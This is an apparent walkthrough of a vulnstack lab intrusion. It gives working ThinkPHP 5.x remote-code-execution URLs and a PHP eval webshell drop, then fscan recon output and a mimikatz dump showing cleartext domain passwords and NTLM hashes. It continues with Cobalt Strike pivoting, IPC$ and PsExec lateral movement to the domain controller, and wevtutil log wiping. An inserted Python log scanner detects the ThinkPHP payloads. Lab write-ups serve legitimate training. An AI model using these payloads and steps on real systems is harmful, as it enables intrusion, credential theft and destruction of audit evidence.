Environment setup
Download address: http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
Network configuration
Use VMnet2 and VMnet3 to configure the IP addresses
WIN7: two network adapters, VMnet2 and VMnet3 (192.168.135.0 and 192.168.138.0)
WIN2008: only VMnet2 (192.168.135.0)
Web penetration
ThinkPHP vulnerability exploitation
Determine the ThinkPHP version from the error message
Command execution payload
http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
File write payload
http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&&vars[1][]=<?php eval($_POST['a']);?>
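Both payloads above hijack the s= route parameter into \think\app::invokefunction and pass the real callee through call_user_func_array. As an added defender-side example that is not part of the original write-up, the Python below scans web-server access-log lines for that pattern and classifies what the request tried to invoke; the sample log lines, function lists and helper names are constructed for the demo.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines for this demo (not from the original page).
SAMPLE_LOG = r"""
10.0.0.5 - - [06/Aug/2023:13:20:01 +0800] "GET /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 931
10.0.0.5 - - [06/Aug/2023:13:20:09 +0800] "GET /?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&&vars[1][]=%3C%3Fphp%20eval(%24_POST%5B%27a%27%5D)%3B%3F%3E HTTP/1.1" 200 12
10.0.0.9 - - [06/Aug/2023:13:21:00 +0800] "GET /index.php?s=index/index/index HTTP/1.1" 200 5120
""".strip()

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Route-hijack marker inside the s= parameter; the leading backslash is optional
# and the think\Container variant of the same route is matched as well.
ROUTE_RE = re.compile(r"(?i)\\?think\\(?:app|container)/invokefunction")
# PHP callees that turn the reflective call into command execution or a file drop.
EXEC_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open", "assert"}
WRITE_FUNCS = {"file_put_contents", "fwrite", "fputs"}

def analyse_target(target):
    """Return a finding for a ThinkPHP 5.x invokefunction request, else None.
    parse_qs percent-decodes values (so %5C and encoded payload bytes are
    normalised) and keeps PHP-style keys such as vars[1][] as literal strings."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    route = params.get("s", [""])[0]
    if not ROUTE_RE.search(route):
        return None
    callee = params.get("vars[0]", [""])[0].lower()
    if callee in EXEC_FUNCS:
        kind = "command-execution"
    elif callee in WRITE_FUNCS:
        kind = "file-write"
    else:
        kind = "invokefunction-probe"
    return {"kind": kind, "callee": callee, "args": params.get("vars[1][]", [])}

def scan_log(text):
    # Returns [(client_ip, finding), ...] for every suspicious request line.
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        finding = analyse_target(m.group("target"))
        if finding:
            findings.append((line.split(" ", 1)[0], finding))
    return findings

if __name__ == "__main__":
    for ip, f in scan_log(SAMPLE_LOG):
        print(f"{ip} {f['kind']}: {f['callee']}({', '.join(f['args'])})")
```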
Internal network penetration
Information gathering
ipconfig /all
fscan scan
shell fscan64.exe -h 192.168.138.0/24
(icmp) Target 192.168.138.136 is alive
(icmp) Target 192.168.138.138 is alive
192.168.138.136:445 open
192.168.138.138:88 open
192.168.138.136:3306 open
192.168.138.138:445 open
192.168.138.138:139 open
192.168.138.1:135 open
192.168.138.138:135 open
192.168.138.136:139 open
192.168.138.136:135 open
192.168.138.136:80 open
[+] 192.168.138.136 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle:http://192.168.138.136 code:200 len:931 title:None
[+] NetInfo:
[*]192.168.138.138
[->]DC
[->]192.168.138.138
[+] NetInfo:
[*]192.168.138.1
[->]xian
[->]192.168.32.1
[->]192.168.78.1
[->]192.168.0.101
[->]192.168.135.1
[->]192.168.138.1
[*] 192.168.138.136 SUN\WIN7 Windows 7 Professional 7601 Service Pack 1
[*] 192.168.138.1 WORKGROUP\XIAN
[+] 192.168.138.138 MS17-010 (Windows Server 2008 HPC Edition 7600)
[*] 192.168.138.138[+]DC SUN\DC Windows Server 2008 HPC Edition 7600
08/06 13:22:00 [+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5-controller-rce
[+] http://192.168.138.136 poc-yaml-thinkphp5023-method-rce poc1
The internal network has two hosts in total: 192.168.138.138 is the domain controller and 192.168.138.136 is the WIN7 domain member host.
Obtaining passwords with logonpasswords
Use the mimikatz bundled with CS to read passwords
Authentication Id : 0 ; 277548 (00000000:00043c2c)
Session : CachedInteractive from 1
User Name : Administrator
Domain : SUN
Logon Server : DC
Logon Time : 2023/8/6 12:44:26
SID : S-1-5-21-3388020223-1982701712-4030140183-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SUN
* LM : c8c42d085b5e3da2e9260223765451f1
* NTLM : e8bea972b3549868cecd667a64a6ac46
* SHA1 : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
tspkg :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
wdigest :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
kerberos :
* Username : Administrator
* Domain : SUN.COM
* Password : dc123.com
ssp :
credman :
Authentication Id : 0 ; 153942 (00000000:00025956)
Session : Interactive from 1
User Name : leo
Domain : SUN
Logon Server : DC
Logon Time : 2023/8/6 12:41:12
SID : S-1-5-21-3388020223-1982701712-4030140183-1110
msv :
[00000003] Primary
* Username : leo
* Domain : SUN
* LM : b73a13e9b7832a35aad3b435b51404ee
* NTLM : afffeba176210fad4628f0524bfe1942
* SHA1 : fa83a92197d9896cb41463b7a917528b4009c650
tspkg :
* Username : leo
* Domain : SUN
* Password : 123.com
wdigest :
* Username : leo
* Domain : SUN
* Password : 123.com
kerberos :
* Username : leo
* Domain : SUN.COM
* Password : 123.com
ssp :
credman :
Account credentials for two users were obtained
* Username : Administrator
* Domain : SUN
* Password : dc123.com
* SID: S-1-5-21-3388020223-1982701712-4030140183-500
* Username : leo
* Domain : SUN.COM
* Password : 123.com
* SID: S-1-5-21-3388020223-1982701712-4030140183-1110
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
heart:1000:aad3b435b51404eeaad3b435b51404ee:a34efdd63a23abea4413ba73cafa5a30:::
Cobalt Strike pivot listener
Select Pivoting -> Listener to create a new listener, using the current internal host 192.168.138.136 as the pivot
Generate the payload
Lateral movement via IPC$
Use the obtained account credentials for lateral movement
net use \\192.168.138.138\ipc$ dc123.com /user:sun\administrator
Establish the IPC connection with the password
Upload the generated payload to the internal host, then copy it to the DC over the established IPC$ connection
shell copy C:\windows\temp\beacon.exe \\192.168.138.138\C$\windows\temp\
Check whether the copy succeeded
shell dir \\192.168.138.138\C$\windows\temp
Execute the file with PsExec to take the DC
Run the command through PsExec so the DC checks in to CS
shell C:\windows\temp\PsExec.exe \\192.168.138.138 /accepteula -u sun\administrator -p dc123.com -d C:\windows\temp\beacon.exe
Log cleanup
List the log statistics and query all log information, including timestamps and record counts
wevtutil gli Application
View the contents of the specified log
wevtutil qe /f:text Application
Delete all contents of that log
wevtutil cl Application
After deleting all log entries, numberOfLogRecords: 0 for Application confirms the clear succeeded